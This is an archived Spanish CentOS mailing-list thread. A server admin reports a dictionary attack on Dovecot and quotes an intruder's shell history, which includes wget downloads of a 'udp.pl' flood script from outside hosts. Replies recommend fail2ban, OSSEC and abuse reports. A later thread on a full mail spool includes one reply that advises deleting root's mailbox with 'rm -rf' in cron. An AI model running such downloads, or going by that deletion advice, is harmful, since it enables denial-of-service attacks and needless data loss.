Buenos días a todos de la lista: Primero que nada les cuento la experiencia que estoy pasando con mi servidor de correos (postfix,dovecot+sasl), hace un mes aproximadamente he notado que el servidor a las 5:00PM es atacado/escaneado o algo asi tratando de conectarse al dovecot especificamente ,les posteo lo que sale...--------------------- pam_unix Begin ------------------------
dovecot:
Authentication Failures:
contacto rhost=66.142.38.137 : 88 Time(s)
teste rhost=66.142.38.137 : 88 Time(s)
basura rhost=66.142.38.137 : 65 Time(s)
renata rhost=66.142.38.137 : 65 Time(s)
financeiro rhost=66.142.38.137 : 64 Time(s)
biblioteca rhost=66.142.38.137 : 62 Time(s)
bodega rhost=66.142.38.137 : 62 Time(s)
licita rhost=66.142.38.137 : 62 Time(s)
clientes rhost=66.142.38.137 : 61 Time(s)
contabilidad rhost=66.142.38.137 : 59 Time(s)
estudio rhost=66.142.38.137 : 59 Time(s)
mrivera rhost=66.142.38.137 : 58 Time(s)
patricio rhost=66.142.38.137 : 58 Time(s)
prueba rhost=66.142.38.137 : 58 Time(s)
usuario rhost=66.142.38.137 : 58 Time(s)
turismo rhost=66.142.38.137 : 57 Time(s) .......... ................. ............(hay mas resgisto q no lo pongo es bastante todos salen de la misma ip) Unknown Entries:
check pass; user unknown: 3901 Time(s) Al parecer es un diccionario que prueba esos usuarios para ingresar al dovecot o bien al postfix.esto ya me pasa desde ya hace un mes y no puedo detectar como y donde se ejecuta, pero si averigue que hicieron y que se bajaron para realizar esto. el cual detallo, yo uso un Centos 6.0 64 bits, fue un usuario interno con conocimiento basicos de linux ( al menos eso creo ) se conecto y hizo eso, (lo saque del history)wget http://y2khom3.evonet.ro/udp.plwget www.buble.biz/alinftp/udp.plwget www.packetstormsecurity.org/DoS/udp.plping www.google.com.peps xcd /tmpls -awpasswd mcondeexit El detalle es que desde ese momento ya tengo el problema que les comente lineas arriba.. a alguien de ustedes la ha pasado de casualidad lo mismo? espero me puedan alguna señal de como detectar de donde se ejecuta dicho escaneo .si esta en mi server y siempre se ejecuta a esa hora?? o es un scaneo externo. Saludos Luis Roman
Buenas Noches.
Lo que indican los logs son fallos de autenticación que provienen de una dirección remota.
rhost=66.142.38.137
Para resolver esto puede instalar un paquete como fail2ban y configurarlo para que chequee los logs de dovecot y cualquier otro servicio que quieras proteger. Fail2ban verifica 3 intentos fallidos de login desde una misma ip y posteriormente procede a bloquearla por un lapso de tiempo.
En cuanto al historial de comandos que mencionas deberias de verificar si fue una intrusión a tu servidor y que efecto tuvo en el mismo. si no han eliminado los registro del servidor estos comandos pueden ayudarte a saber que usuario logro entrar.
last lastlog
Puedes indagar más sobre que hace el código que se descargo el intruso y si tuvo algun efecto en tu servidor. generalmente estos se usan para escalar privilegios en el servidor y como rootkit. Existen herramientas como rootkithuter que te permiten detectar software malicioso en el servidor.
Saludos.
From: luisroman80@hotmail.com To: centos-es@centos.org Date: Thu, 21 Mar 2013 15:55:31 +0000 Subject: [CentOS-es] Servidor Scaneado por un diccionario de datos en postfix+dovecot
Buenos días a todos de la lista: Primero que nada les cuento la experiencia que estoy pasando con mi servidor de correos (postfix,dovecot+sasl), hace un mes aproximadamente he notado que el servidor a las 5:00PM es atacado/escaneado o algo asi tratando de conectarse al dovecot especificamente ,les posteo lo que sale...--------------------- pam_unix Begin
dovecot:
AuthenticationFailures:
contactorhost=66.142.38.137 : 88 Time(s)
testerhost=66.142.38.137 : 88 Time(s)
basurarhost=66.142.38.137 : 65 Time(s)
renatarhost=66.142.38.137 : 65 Time(s)
financeirorhost=66.142.38.137 : 64 Time(s)
bibliotecarhost=66.142.38.137 : 62 Time(s)
bodegarhost=66.142.38.137 : 62 Time(s)
licitarhost=66.142.38.137 : 62 Time(s)
clientesrhost=66.142.38.137 : 61 Time(s)
contabilidadrhost=66.142.38.137 : 59 Time(s)
estudiorhost=66.142.38.137 : 59 Time(s)
mriverarhost=66.142.38.137 : 58 Time(s)
patriciorhost=66.142.38.137 : 58 Time(s)
pruebarhost=66.142.38.137 : 58 Time(s)
usuariorhost=66.142.38.137 : 58 Time(s)
turismorhost=66.142.38.137 : 57 Time(s) .......... ................. ............(hay mas resgisto q no lo pongo es bastante todos salen de la misma ip) Unknown Entries:
check pass;user unknown: 3901 Time(s) Al parecer es un diccionario que prueba esos usuarios para ingresar al dovecot o bien al postfix.esto ya me pasa desde ya hace un mes y no puedo detectar como y donde se ejecuta, pero si averigue que hicieron y que se bajaron para realizar esto. el cual detallo, yo uso un Centos 6.0 64 bits, fue un usuario interno con conocimiento basicos de linux ( al menos eso creo ) se conecto y hizo eso, (lo saque del history)wget http://y2khom3.evonet.ro/udp.plwget www.buble.biz/alinftp/udp.plwget www.packetstormsecurity.org/DoS/udp.plping www.google.com.peps xcd /tmpls -awpasswd mcondeexit El detalle es que desde ese momento ya tengo el problema que les comente lineas arriba.. a alguien de ustedes la ha pasado de casualidad lo mismo? espero me puedan alguna señal de como detectar de donde se ejecuta dicho escaneo .si esta en mi server y siempre se ejecuta a esa hora?? o es un scaneo externo. Saludos Luis Roman
CentOS-es mailing list CentOS-es@centos.org http://lists.centos.org/mailman/listinfo/centos-es
Hola,
Le 21/03/2013 16:55, Luis Alberto Roman Aguirre a écrit :
Buenos días a todos de la lista: Primero que nada les cuento la experiencia que estoy pasando con mi servidor de correos (postfix,dovecot+sasl), hace un mes aproximadamente he notado que el servidor a las 5:00PM es atacado/escaneado o algo asi tratando de conectarse al dovecot especificamente ,les posteo lo que sale...--------------------- pam_unix Begin
dovecot:
AuthenticationFailures:
contactorhost=66.142.38.137 : 88 Time(s)
[...]
turismorhost=66.142.38.137 : 57 Time(s) .......... ................. ............(hay mas resgisto q no lo pongo es bastante todos salen de la misma ip) Unknown Entries:
check pass;user unknown: 3901 Time(s) Al parecer es un diccionario que prueba esos usuarios para ingresar al dovecot o bien al postfix.esto ya me pasa desde ya hace un mes y no puedo detectar como y donde se ejecuta, pero si averigue que hicieron y que se bajaron para realizar esto. el cual detallo, yo uso un Centos 6.0 64 bits, fue un usuario interno con conocimiento basicos de linux ( al menos eso creo ) se conecto y hizo eso, (lo saque del history)wget http://y2khom3.evonet.ro/udp.plwget www.buble.biz/alinftp/udp.plwget www.packetstormsecurity.org/DoS/udp.plping www.google.com.peps xcd /tmpls -awpasswd mcondeexit El detalle es que desde ese momento ya tengo el problema que les comente lineas arriba.. a alguien de ustedes la ha pasado de casualidad lo mismo? espero me puedan alguna señal de como detectar de donde se ejecuta dicho escaneo .si esta en mi server y siempre se ejecuta a esa hora?? o es un scaneo externo. Saludos Luis Roman
Como te ha respondido José Fernández los logs muestran intentos de conexión desde la IP 66.142.38.137. Parece ser que se trata de una ADSL de un proveedor de Internet del suroeste de los EEUU, SouthWestern Bell, que a su vez parece ser propiedad de AT&T:
adsl-66-142-38-137.dsl.kscymo.swbell.net
Si siempre es esta IP la que trata de acceder a tu servidor contacta con ellos, tienen una cuenta de correo para estos casos. Escríbeles a abuse@swbell.net y explícales el problema. Deberían poner remedio.
http://public.swbell.net/contact.html
Saludos.
Configurate un servicio OSSEC es un detector de intrusos basado en host y rootkit El 22/03/2013 02:32, "Francesc Guitart" francesc.guitart@enise.fr escribió:
Hola,
Le 21/03/2013 16:55, Luis Alberto Roman Aguirre a écrit :
Buenos días a todos de la lista: Primero que nada les cuento la experiencia que estoy pasando con mi
servidor de correos (postfix,dovecot+sasl), hace un mes aproximadamente he notado que el servidor a las 5:00PM es atacado/escaneado o algo asi tratando de conectarse al dovecot especificamente ,les posteo lo que sale...--------------------- pam_unix Begin
dovecot:
AuthenticationFailures:
contactorhost=66.142.38.137 : 88 Time(s)
[...]
turismorhost=66.142.38.137 : 57 Time(s) ..........
................. ............(hay mas resgisto q no lo pongo es bastante todos salen de la misma ip) Unknown Entries:
check pass;user unknown: 3901 Time(s) Al parecer es un diccionario que prueba esos usuarios para ingresar al
dovecot o bien al postfix.esto ya me pasa desde ya hace un mes y no puedo detectar como y donde se ejecuta, pero si averigue que hicieron y que se bajaron para realizar esto.
el cual detallo, yo uso un Centos 6.0 64 bits, fue un usuario interno
con conocimiento basicos de linux ( al menos eso creo ) se conecto y hizo eso, (lo saque del history)wget http://y2khom3.evonet.ro/udp.plwget www.buble.biz/alinftp/udp.plwget www.packetstormsecurity.org/DoS/udp.plping www.google.com.peps xcd /tmpls -awpasswd mcondeexit
El detalle es que desde ese momento ya tengo el problema que les
comente lineas arriba.. a alguien de ustedes la ha pasado de casualidad lo mismo? espero me puedan alguna señal de como detectar de donde se ejecuta dicho escaneo .si esta en mi server y siempre se ejecuta a esa hora?? o es un scaneo externo.
Saludos Luis Roman
Como te ha respondido José Fernández los logs muestran intentos de conexión desde la IP 66.142.38.137. Parece ser que se trata de una ADSL de un proveedor de Internet del suroeste de los EEUU, SouthWestern Bell, que a su vez parece ser propiedad de AT&T:
adsl-66-142-38-137.dsl.kscymo.swbell.net
Si siempre es esta IP la que trata de acceder a tu servidor contacta con ellos, tienen una cuenta de correo para estos casos. Escríbeles a abuse@swbell.net y explícales el problema. Deberían poner remedio.
http://public.swbell.net/contact.html
Saludos.
-- Francesc Guitart
CentOS-es mailing list CentOS-es@centos.org http://lists.centos.org/mailman/listinfo/centos-es
Puedes instalarte Fail2Ban que soporta Dovecot: http://wiki.dovecot.org/HowTo/Fail2Ban
Cuando detecte el número de fallos que configures en un tiempo también configurable, inserta una regla IPTables que bloquea a esa IP un tiempo que también puedes configurar.
Lo puedes usar también para SSH y otros servicios.
-- José María Terry Jiménez
El jueves 21 de marzo de 2013 a las 16:55, Luis Alberto Roman Aguirre escribió:
Buenos días a todos de la lista: Primero que nada les cuento la experiencia que estoy pasando con mi servidor de correos (postfix,dovecot+sasl), hace un mes aproximadamente he notado que el servidor a las 5:00PM es atacado/escaneado o algo asi tratando de conectarse al dovecot especificamente ,les posteo lo que sale...--------------------- pam_unix Begin
dovecot:
Authentication Failures:
contacto rhost=66.142.38.137 : 88 Time(s)
teste rhost=66.142.38.137 : 88 Time(s)
basura rhost=66.142.38.137 : 65 Time(s)
renata rhost=66.142.38.137 : 65 Time(s)
financeiro rhost=66.142.38.137 : 64 Time(s)
biblioteca rhost=66.142.38.137 : 62 Time(s)
bodega rhost=66.142.38.137 : 62 Time(s)
licita rhost=66.142.38.137 : 62 Time(s)
clientes rhost=66.142.38.137 : 61 Time(s)
contabilidad rhost=66.142.38.137 : 59 Time(s)
estudio rhost=66.142.38.137 : 59 Time(s)
mrivera rhost=66.142.38.137 : 58 Time(s)
patricio rhost=66.142.38.137 : 58 Time(s)
prueba rhost=66.142.38.137 : 58 Time(s)
usuario rhost=66.142.38.137 : 58 Time(s)
turismo rhost=66.142.38.137 : 57 Time(s) .......... ................. ............(hay mas resgisto q no lo pongo es bastante todos salen de la misma ip) Unknown Entries:
check pass; user unknown: 3901 Time(s) Al parecer es un diccionario que prueba esos usuarios para ingresar al dovecot o bien al postfix.esto ya me pasa desde ya hace un mes y no puedo detectar como y donde se ejecuta, pero si averigue que hicieron y que se bajaron para realizar esto. el cual detallo, yo uso un Centos 6.0 64 bits, fue un usuario interno con conocimiento basicos de linux ( al menos eso creo ) se conecto y hizo eso, (lo saque del history)wget http://y2khom3.evonet.ro/udp.plwget www.buble.biz/alinftp/udp.plwget (http://www.buble.biz/alinftp/udp.plwget) www.packetstormsecurity.org/DoS/udp.plping (http://www.packetstormsecurity.org/DoS/udp.plping) www.google.com.peps (http://www.google.com.peps) xcd /tmpls -awpasswd mcondeexit El detalle es que desde ese momento ya tengo el problema que les comente lineas arriba.. a alguien de ustedes la ha pasado de casualidad lo mismo? espero me puedan alguna señal de como detectar de donde se ejecuta dicho escaneo .si esta en mi server y siempre se ejecuta a esa hora?? o es un scaneo externo. Saludos Luis Roman
CentOS-es mailing list CentOS-es@centos.org (mailto:CentOS-es@centos.org) http://lists.centos.org/mailman/listinfo/centos-es
Hola Compañeros, les solicito un favor urgente, en mi particion var/spool/mail me quede sis espacio como hago para mover esta a otra particion donde tengo mas espacio. Yo utilizo sendmail.
Les agradesco la pronta respuesta es to es un poco urgente..
De antemano muchas gracias.
******************************************** Cesar Augusto Martinez Cobo Administrador de Sistemas Facultad de Ciencias Exactas y Naturales Universidad de Antioquia Medellin - Colombia ********************************************
Hola yo solucione eso con este comando rm -rf /var/spool/mail/root se llena porque cada momento que haces algo suele generar un email para root, programa un cron para que se ejecute ese comando cada cierto tiempo de esa forma no tendrás este inconveniente
Cordialmente
Ing. César Martínez SERVICOM User Linux 494131
Números Convencionales 02-2554-271 02-2221-386 Extensión 4501 Móvil 09-99374-317 Usa (315) 519-7220 Email & Msn cmartinez@servicomecuador.com Skype servicomecuador Web www.servicomecuador.com Síguenos en Twitter: http://twitter.com/servicomecuador Facebook: http://www.facebook.com/servicomec Zona Clientes: www.servicomecuador.com/billing Blog: http://servicomecuador.com/blog
Dir. Av. 10 de Agosto N29-140 Entre Acuña y Cuero y Caicedo Edificio Vivanco Castillo 2do. Piso Oficina 201 Quito - Ecuador - Sudamérica
=================================================
Cláusula de Confidencialidad La información contenida en este e-mail es confidencial y solo puede ser utilizada por la persona a la cual esta dirigida.Si Usted no es el receptor autorizado, cualquier retención, difusión, distribución o copia de este mensaje es prohibida y sancionada por la ley. Si por error recibe este mensaje, por favor reenviarlo al remitente y borre el mensaje recibido inmediatamente. =================================================
On 26/03/13 11:09, Cesar Augusto Martinez Cobo wrote:
Hola Compañeros, les solicito un favor urgente, en mi particion var/spool/mail me quede sis espacio como hago para mover esta a otra particion donde tengo mas espacio. Yo utilizo sendmail.
Les agradesco la pronta respuesta es to es un poco urgente..
De antemano muchas gracias.
Cesar Augusto Martinez Cobo Administrador de Sistemas Facultad de Ciencias Exactas y Naturales Universidad de Antioquia Medellin - Colombia
CentOS-es mailing list CentOS-es@centos.org http://lists.centos.org/mailman/listinfo/centos-es
El 26 de marzo de 2013 10:34, César Martinez cmartinez@servicomecuador.comescribió:
Hola yo solucione eso con este comando rm -rf /var/spool/mail/root se llena porque cada momento que haces algo suele generar un email para root, programa un cron para que se ejecute ese comando cada cierto tiempo de esa forma no tendrás este inconveniente
Cordialmente
Ing. César Martínez SERVICOM User Linux 494131
Números Convencionales 02-2554-271 02-2221-386 Extensión 4501 Móvil 09-99374-317 Usa (315) 519-7220 Email & Msn cmartinez@servicomecuador.com Skype servicomecuador Web www.servicomecuador.com Síguenos en Twitter: http://twitter.com/servicomecuador Facebook: http://www.facebook.com/servicomec Zona Clientes: www.servicomecuador.com/billing Blog: http://servicomecuador.com/blog
Dir. Av. 10 de Agosto N29-140 Entre Acuña y Cuero y Caicedo Edificio Vivanco Castillo 2do. Piso Oficina 201 Quito - Ecuador - Sudamérica
=================================================
Cláusula de Confidencialidad La información contenida en este e-mail es confidencial y solo puede ser utilizada por la persona a la cual esta dirigida.Si Usted no es el receptor autorizado, cualquier retención, difusión, distribución o copia de este mensaje es prohibida y sancionada por la ley. Si por error recibe este mensaje, por favor reenviarlo al remitente y borre el mensaje recibido inmediatamente. =================================================
On 26/03/13 11:09, Cesar Augusto Martinez Cobo wrote:
Hola Compañeros, les solicito un favor urgente, en mi particion
var/spool/mail me quede
sis espacio como hago para mover esta a otra particion donde tengo mas
espacio.
Yo utilizo sendmail.
Les agradesco la pronta respuesta es to es un poco urgente..
De antemano muchas gracias.
Cesar Augusto Martinez Cobo Administrador de Sistemas Facultad de Ciencias Exactas y Naturales Universidad de Antioquia Medellin - Colombia
CentOS-es mailing list CentOS-es@centos.org http://lists.centos.org/mailman/listinfo/centos-es
CentOS-es mailing list CentOS-es@centos.org http://lists.centos.org/mailman/listinfo/centos-es
Cordial saludo.
Puedes hacer lo siguiente:
1. Ventana de tiempo para que tus usuarios estén avisados que realizaras una actividad sobre el servidor de correo
2. Detener el servicio
3. mover /var/spool/mail a /ruta_con_espacio (solo el subdirectorio "mail")
4. ubicado en /var/spool realizar un link simbolico al subdirectorio mail que moviste en el ítem anterior
5. asegurarte que en el espacio donde ubicaste el subdirectorio "mail", este quede con los mismos permisos, propietario y grupo que tenia en la ubicación original
6. subir el servicio.
7. pruebas de funcionalidad.
8. cierre de la ventana de tiempo solicitada a tus usuarios.
-
Carlos Restrepo -
Cesar Augusto Martinez Cobo -
César Martinez -
Francesc Guitart -
Jesus Armando Uch Canul -
Jose Fernández Rodríguez -
José María Terry Jiménez -
Luis Alberto Roman Aguirre